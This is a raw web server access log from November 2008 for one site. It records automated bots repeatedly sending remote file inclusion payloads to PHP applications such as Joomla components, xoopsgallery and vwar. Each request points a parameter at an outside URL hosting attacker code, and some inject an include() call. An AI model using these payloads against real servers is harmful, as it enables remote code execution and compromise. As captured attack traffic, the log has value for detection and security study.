218.219.198.195 - - [29/Nov/2008:09:52:19 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:09:52:19 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:09:52:33 -0800] "GET /logs/access_080908.log/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:52:41 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.geocities.com/lophemiee/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:52:41 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.geocities.com/lophemiee/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:53:05 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:53:05 -0800] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:53:05 -0800] "GET /appserv/main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:09:53:15 -0800] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:53:24 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:53:24 -0800] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:53:24 -0800] "GET /appserv/main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.130.101.5 - - [29/Nov/2008:09:54:06 -0800] "GET /logs/access_080529.log/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.csjh.tpc.edu.tw/~sw/board/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:54:08 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:54:09 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:54:09 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:09:54:11 -0800] "GET /logs/access_080621.log/lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:09:54:11 -0800] "GET /logs/access_080621.log/lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:09:54:11 -0800] "GET /lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:09:54:11 -0800] "GET /lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:09:54:12 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:09:54:12 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:54:15 -0800] "GET /logs/access_080615.log//downloadmp3.php?download=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:54:15 -0800] "GET /downloadmp3.php?download=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:54:15 -0800] "GET /logs//downloadmp3.php?download=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:09:54:32 -0800] "GET /logs/access_080621.log/lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:09:54:33 -0800] "GET /lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:09:54:33 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:09:54:42 -0800] "GET /logs/access_080509.log/view.php?sub=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:09:54:42 -0800] "GET /view.php?sub=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:09:54:43 -0800] "GET /logs/view.php?sub=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:54:47 -0800] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:09:55:03 -0800] "GET /logs/access_080828.log/view.php?sub=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.238.163.25 - - [29/Nov/2008:09:55:09 -0800] "GET /logs/access_080824.log//pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.163.25 - - [29/Nov/2008:09:55:09 -0800] "GET /logs/access_080824.log//pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:09:55:13 -0800] "GET /logs/access_080713.log/lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:09:55:14 -0800] "GET /logs/access_080713.log/lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [29/Nov/2008:09:55:32 -0800] "GET /logs/access_080713.log/lostpasswd.php?env[include_prefix]=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:55:36 -0800] "GET /downloadmp3.php?download=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:55:36 -0800] "GET /logs/access_080615.log//downloadmp3.php?download=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:55:36 -0800] "GET /logs//downloadmp3.php?download=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:55:43 -0800] "GET /logs//vwar/war.php?vwar_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:55:43 -0800] "GET /logs/access_080201.log//vwar/war.php?vwar_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:55:43 -0800] "GET /logs/access_080127.log//vwar/war.php?vwar_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:55:43 -0800] "GET /vwar/war.php?vwar_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:55:44 -0800] "GET /logs/access_080615.log//downloadmp3.php?download=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:55:44 -0800] "GET /logs//downloadmp3.php?download=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:55:44 -0800] "GET /downloadmp3.php?download=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:55:46 -0800] "GET /vwar/war.php?vwar_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:55:46 -0800] "GET /logs//vwar/war.php?vwar_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:55:46 -0800] "GET /logs/access_080127.log%20%20//vwar/war.php?vwar_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:56:11 -0800] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:56:11 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:56:11 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:56:15 -0800] "GET /logs/access_080928.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/xdedzx/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:56:29 -0800] "GET /logs/access_080111.log%20%20//vwar/war.php?vwar_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.221.119.3 - - [29/Nov/2008:09:56:33 -0800] "GET /technote7/data/errors.php?error=http://www.momsbid.com/uploaded/includes/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
193.221.119.3 - - [29/Nov/2008:09:56:33 -0800] "GET /logs/technote7/data/errors.php?error=http://www.momsbid.com/uploaded/includes/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:56:35 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:56:35 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.66.107 - - [29/Nov/2008:09:56:58 -0800] "GET /view.php?sub=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:09:56:59 -0800] "GET /logs/access_080804.log//pjsfiles/modify.php?installed_config_file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:09:57:01 -0800] "GET /senetman/html/index.php?page=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:57:32 -0800] "GET /vwar/war.php?vwar_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:57:32 -0800] "GET /logs//vwar/war.php?vwar_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:57:32 -0800] "GET /logs/access_080201.log//vwar/war.php?vwar_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:57:32 -0800] "GET /logs/access_080127.log//vwar/war.php?vwar_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:57:39 -0800] "GET /logs/access_081008.log///index.php?_SERVER[DOCUMENT_ROOT]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.214.192.26 - - [29/Nov/2008:09:57:42 -0800] "GET /logs/access_080816.log//pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:57:42 -0800] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 95177 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:57:43 -0800] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.214.192.26 - - [29/Nov/2008:09:57:45 -0800] "GET /pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
88.214.192.26 - - [29/Nov/2008:09:57:45 -0800] "GET /logs//pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:57:55 -0800] "GET /logs/access_080411.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:57:55 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:57:56 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.182.135.178 - - [29/Nov/2008:09:58:12 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pgeh.hs.kr/~meca/zb41pl4//test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
195.182.135.178 - - [29/Nov/2008:09:58:12 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pgeh.hs.kr/~meca/zb41pl4//test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:09:58:20 -0800] "GET /logs/access_080511.log//senetman/html/index.php?page=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:09:58:20 -0800] "GET /senetman/html/index.php?page=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:09:58:21 -0800] "GET /logs//senetman/html/index.php?page=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.214.192.26 - - [29/Nov/2008:09:58:35 -0800] "GET /logs/access_080816.log//pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.195.54.236 - - [29/Nov/2008:09:58:41 -0800] "GET /logs//Worksheet.php?mosConfig_absolute_path=http://masla.su/image/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.195.54.236 - - [29/Nov/2008:09:58:41 -0800] "GET /Worksheet.php?mosConfig_absolute_path=http://masla.su/image/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:58:54 -0800] "GET /logs/access_080411.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:58:54 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:58:55 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.92.85.234 - - [29/Nov/2008:09:59:06 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.92.85.234 - - [29/Nov/2008:09:59:06 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:09:59:10 -0800] "GET /pjsfiles/modify.php?installed_config_file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:09:59:13 -0800] "GET /logs/access_080409.log//senetman/html/index.php?page=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:59:23 -0800] "GET /logs/access_080411.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:59:24 -0800] "GET /logs/access_080722.log///index.php?_SERVER[DOCUMENT_ROOT]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:59:24 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:59:25 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.238.163.25 - - [29/Nov/2008:09:59:47 -0800] "GET /pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:09:59:48 -0800] "GET /logs/access_080715.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:09:59:48 -0800] "GET /logs/access_080715.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:09:59:48 -0800] "GET /logs/access_080715.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:09:59:48 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:09:59:48 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:09:59:48 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:09:59:48 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:09:59:48 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:09:59:49 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.238.163.25 - - [29/Nov/2008:09:59:51 -0800] "GET /pjsfiles/modify.php?installed_config_file=http://www.anderlechtenforme.be//id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:10:00:11 -0800] "GET /logs/access_080908.log/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:10:00:14 -0800] "GET /logs//senetman/html/index.php?page=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:10:00:15 -0800] "GET /senetman/html/index.php?page=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:10:00:25 -0800] "GET /logs//Worksheet.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:10:00:25 -0800] "GET /Worksheet.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:10:00:25 -0800] "GET /Worksheet.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:10:00:25 -0800] "GET /logs//Worksheet.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.49.188.178 - - [29/Nov/2008:10:00:43 -0800] "GET /logs/access_080522.log/index.phpmain.php?x=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:10:00:45 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.49.188.178 - - [29/Nov/2008:10:00:45 -0800] "GET /index.phpmain.php?x=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 7984 "-" "libwww-perl/5.79" "www.dmulk.com"
